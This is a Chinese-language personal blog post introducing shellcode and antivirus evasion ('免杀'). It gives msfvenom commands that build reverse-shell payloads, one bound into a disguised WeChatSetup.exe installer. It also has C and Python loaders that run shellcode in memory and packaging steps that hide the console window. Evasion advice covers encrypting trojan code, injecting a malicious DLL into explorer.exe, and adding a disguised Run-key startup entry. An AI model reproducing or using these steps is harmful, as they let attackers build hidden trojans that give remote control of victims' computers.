<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8" />
  <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, viewport-fit=cover" name="viewport" />
  <title>
    
    ShellCode和免杀入门 丨
    

    typo
  </title>

  
  <link rel="shortcut icon" href="/icon.svg">
  

  <link rel="preconnect" href="https://cdnjs.cloudflare.com">
  
  <link id="theme" rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/styles/atom-one-light.css">
  <script src="https://unpkg.com/@highlightjs/cdn-assets@11.9.0/highlight.min.js"></script>
  

  <!-- 字体 -->
  <link rel="preconnect" href="https://fonts.googleapis.com">
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
  <link href="https://fonts.googleapis.com/css2?family=Montserrat:ital,wght@0,100..900;1,100..900&display=swap" rel="stylesheet">
  <link href="https://fonts.googleapis.com/css2?family=JetBrains+Mono:ital,wght@0,100..800;1,100..800&display=swap" rel="stylesheet">

  
<link rel="stylesheet" href="/css/root.css">

  
<link rel="stylesheet" href="/css/style.css">

  
<link rel="stylesheet" href="/css/post.css">

<meta name="generator" content="Hexo 7.3.0"></head>

<body>
  <header class="header">
  <section class="header-container">
    <a class="logo" href="/">Leo的随便写写</a>
    <ul class="nav">
      
      <li><a href="/archives">archives</a></li>
      
      <li><a href="/about">about</a></li>
      
    </ul>
  </section>
</header>
  <main class="main">
    <article class="post">
  
  <div class="post-title">ShellCode和免杀入门</div>
  <div class="post-meta">
    <div class="date">2024 November 21st</div>
    <div class="tags">
      
      <div class="tag-item">安全技术</div>
      
    </div>
  </div>
  

  <main class="post-content"><h4 id="何为shellcode"><a href="#何为shellcode" class="headerlink" title="何为shellcode"></a>何为shellcode</h4><p><strong>Shellcode</strong>是一种以机器代码形式存在的小段指令，通常用于在目标系统中执行特定操作，最初主要是用来在系统上获取一个“shell”访问权限（即控制终端）。其广泛用于渗透测试和漏洞利用，也用于在应用程序或操作系统中触发特定的操作。</p>
<h5 id="shellcode奏效流程"><a href="#shellcode奏效流程" class="headerlink" title="shellcode奏效流程"></a>shellcode奏效流程</h5><p>常shellcode确实需要嵌入或打包在一个可执行程序中才能运行。Shellcode本质上是一段机器指令，而操作系统不会直接运行二进制数据；它需要一个载体程序来将其加载到内存中，并赋予它相应的权限。<br><strong>一般情况下，shellcode的执行流程如下</strong>：</p>
<ol>
<li><strong>载体程序</strong>：创建一个可执行程序（通常是C&#x2F;C++编写的程序），使用系统调用（如VirtualAlloc、mprotect等）来分配可执行的内存空间。</li>
<li><strong>加载shellcode</strong>：将shellcode复制到分配好的内存地址。</li>
<li><strong>执行shellcode</strong>：通过函数指针或类似方法调用此内存地址，以便执行其中的指令。</li>
</ol>
<h5 id="shellcode生成"><a href="#shellcode生成" class="headerlink" title="shellcode生成"></a>shellcode生成</h5><ul>
<li>msf 生成shellcode –产生一段shellcode在c文件中</li>
</ul>
<pre><code class="highlight plaintext">msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=10.10.20.67 LPORT=8888 -e x86/shikata_ga_nai -i 15 -b &#x27;\x00\&#x27; PrependMigrate=true PrependMigrateProc=svchost.exe -f c &gt; shellcode.c</code></pre>

<p><img src="/images/shellcode/shell1.png" alt="长这样"></p>
<ul>
<li>msf 生成执行木马 —- 相当于已经打包好</li>
</ul>
<pre><code class="highlight plaintext">msfvenom -l encoders

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9999 -e x86/shikata_ga_nai -x WeChatSetup.exe -i 12 -f exe -o /root/WeChatSetup1.exe

-e /指定编码方式对攻击载荷进行重新编码

-x /指定木马捆绑在哪个可执行程序模板上

-i /指定对目标进行编码的次数，多次编码理论上有助于免杀的实现

-f /指定msf编码器输出程序的格式

-0 /指定处理完毕后的文件输出路径</code></pre>

<h4 id="shellcode打包"><a href="#shellcode打包" class="headerlink" title="shellcode打包"></a>shellcode打包</h4><h5 id="C打包"><a href="#C打包" class="headerlink" title="C打包"></a>C打包</h5><ul>
<li>打包器–c lang 编译生成可执行文件</li>
</ul>
<pre><code class="highlight plaintext">#include&lt;stdio.h&gt;

#include&lt;windows.h&gt;

#pragma comment(linker,&quot;/subsystem:\&quot;windows\&quot; /entry:\&quot;mainCRTStartup\&quot;&quot;)

unsigned char shellcode[]= 这里填shellcode;

void main()&#123;

     LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

     memcpy(Memory, shellcode, sizeof(shellcode));

    ((void(*)())Memory)();

&#125;</code></pre>

<h5 id="python打包"><a href="#python打包" class="headerlink" title="python打包"></a>python打包</h5><ul>
<li>python处理shellcode    主要使用ctypes库实现<br>1、申请内存  2、写入shellcode   3、运行shellcode</li>
</ul>
<pre><code class="highlight plaintext"># -*-coding:utf-8 -*-
&quot;&quot;&quot;
ctypes库是Python中用来调用系统动态链接库函数的模块，利用ctypes库可以调用C语言的动态链接库并向其传递函数
&quot;&quot;&quot;
import ctypes

shellcode = bytearray(b&#x27;&#x27;)

# 使用restype函数设置VirtualAlloc返回类型为ctypes.c_unit64，否则默认的是32位
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64

# 申请内存，调用kernel32.dll动态链接库中的VirtualAlloc函数申请内存
ptr = ctypes.windll.kernel32.VirtualAlloc(
    ctypes.c_int(0),  # 指向要分配的区域的起始地址的指针，值为null时指向系统保留其认为合适的区域
    ctypes.c_int(len(shellcode)),  # 分配区域的大小
    ctypes.c_int(0x3000),  # 内存分配的类型
    ctypes.c_int(0x40),  # 要分配的页区域的内存保护，可读可写可执行
)

# 调用kernel32.dll动态链接库中的RtlMoveMemory函数将shellcode移动到申请的内存中
buffer = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
    ctypes.c_uint64(ptr),  # 指向要将字节复制到的目标内存块的指针
    buffer,  # 指向要从中复制字节的源内存块的指针
    ctypes.c_int(len(shellcode))  # 从源复制到目标的字节数
)

# 创建一个线程从shellcode放置位置首地址开始执行
handle = ctypes.windll.kernel32.CreateThread(
    ctypes.pointer(ctypes.c_int(0)),  # 指向SECURITY_ATTRIBUTES结构的指针，线程安全属性
    ctypes.c_int(0),  # 堆栈的初始大小
    ctypes.c_void_p(ptr),  # 指向由线程执行的应用程序定义函数的指针
    ctypes.pointer(ctypes.c_int(0)),  # 指向要传递给线程的变量的指针
    ctypes.c_int(0),  # 控制线程创建的标志，为0表示创建后，线程会立即运行
    ctypes.pointer(ctypes.c_int(0))  # 指向接收线程标识符的变量的指针，如果此参数为NULL，则不返回线程标识符
)

# 等待创建线程运行完成
ctypes.windll.kernel32.WaitForSingleObject(
    ctypes.c_int(handle),  # 对象的句柄
    ctypes.c_int(-1)  # 超时间隔，以毫秒为单位，将其设为负数，等待时间将成为无限等待，程序就不会结束
)</code></pre>

<h5 id="python—-可执行文件"><a href="#python—-可执行文件" class="headerlink" title="python—&gt;可执行文件"></a>python—&gt;可执行文件</h5><p><code>nuitka --standalone --onefile --windows-disable-console xx.py</code></p>
<p><code>pyinstaller --onefile --noconsole your_script.py</code>  （py-》exe）</p>
<h4 id="免杀"><a href="#免杀" class="headerlink" title="免杀"></a>免杀</h4><p>所谓免杀，即躲过系统安全软件的各种检测，顺利执行。</p>
<h5 id="常见查杀机制"><a href="#常见查杀机制" class="headerlink" title="常见查杀机制"></a>常见查杀机制</h5><ul>
<li>静态查杀:杀毒软件公司从各种途径获取到的病毒样本，在人工检查确认是病毒后，就开始提取这个病毒文件的特征码，所谓的特征码就是可以唯一标识这个文件的数据，例如最简单可以使用文件MD5值hash、文件名、函数名、敏感字符串、敏感api等等</li>
<li>动态查杀: 检测内存和hook api，通过模拟计算机的环境执行目标文件再观察特征行为。监测点:系统服务、注册表、组策略、防火墙、敏感程序、各种API(监控进程调用的api不止是api名称，还包括api的调用顺序、调用源、参数等等。)、文件夹。</li>
</ul>
<h5 id="如何免杀"><a href="#如何免杀" class="headerlink" title="如何免杀"></a>如何免杀</h5><ol>
<li><strong>代码混淆与加密环节</strong><ul>
<li><strong>加密算法运用</strong>：对木马的核心代码（如控制指令部分、数据窃取模块等）使用高级加密标准（AES）、RSA 等加密算法进行加密。这样，在木马程序传输和存储阶段，反病毒软件很难直接解析出其中的恶意内容。例如，当木马程序在被扫描时，反病毒软件看到的只是一堆经过加密的乱码，只有木马程序在内存中运行时，通过内置的解密模块解密后才能执行真正的恶意操作。</li>
<li><strong>代码混淆技术</strong>：采用代码混淆工具和技术，改变代码的结构和逻辑顺序。这包括重命名变量、函数，打乱代码块的顺序，插入无用代码（如大量的<code>NOP</code>指令，即空操作指令）等。例如，将一个简单的用于文件窃取的函数中的变量名从有意义的名称（如<code>file_path</code>）改为无意义的随机字符（如<code>a1b2c3</code>），并且在函数体中随机插入一些不影响功能的<code>NOP</code>指令，使得反病毒软件难以通过特征码匹配来识别。</li>
</ul>
</li>
<li><strong>加载方式创新环节</strong><ul>
<li><strong>利用合法程序加载</strong>：通过将木马程序注入到合法的系统进程或应用程序中，借助合法程序的加载机制来躲避查杀。例如，利用 Windows 操作系统中的<code>DLL</code>（动态链接库）加载机制，将木马代码封装成一个恶意<code>DLL</code>文件，然后通过修改合法进程（如<code>explorer.exe</code>）的加载配置，使其加载这个恶意<code>DLL</code>。在反病毒软件看来，它只是检测到正常程序的加载行为，很难发现其中隐藏的木马。</li>
<li><strong>隐蔽启动项利用</strong>：修改系统的启动项设置，以一种隐蔽的方式启动木马。例如，在 Windows 系统的注册表<code>HKCU\Software\Microsoft\Windows\CurrentVersion\Run</code>下添加一个伪装成系统关键组件的启动项，其指向木马程序。并且这个启动项的名称和路径可能会被精心设计，使其看起来像是正常的系统程序启动路径，如使用与系统组件相似的文件名，骗过反病毒软件的初始扫描。</li>
</ul>
</li>
</ol>
</main>

</article>


<script src="/js/highlight.js"></script>

  </main>
  <footer class="footer">
  
  <span>Copyright © 2024 typo</span>
  
</footer>
  
<script src="/js/theme.js"></script>

</body>

</html>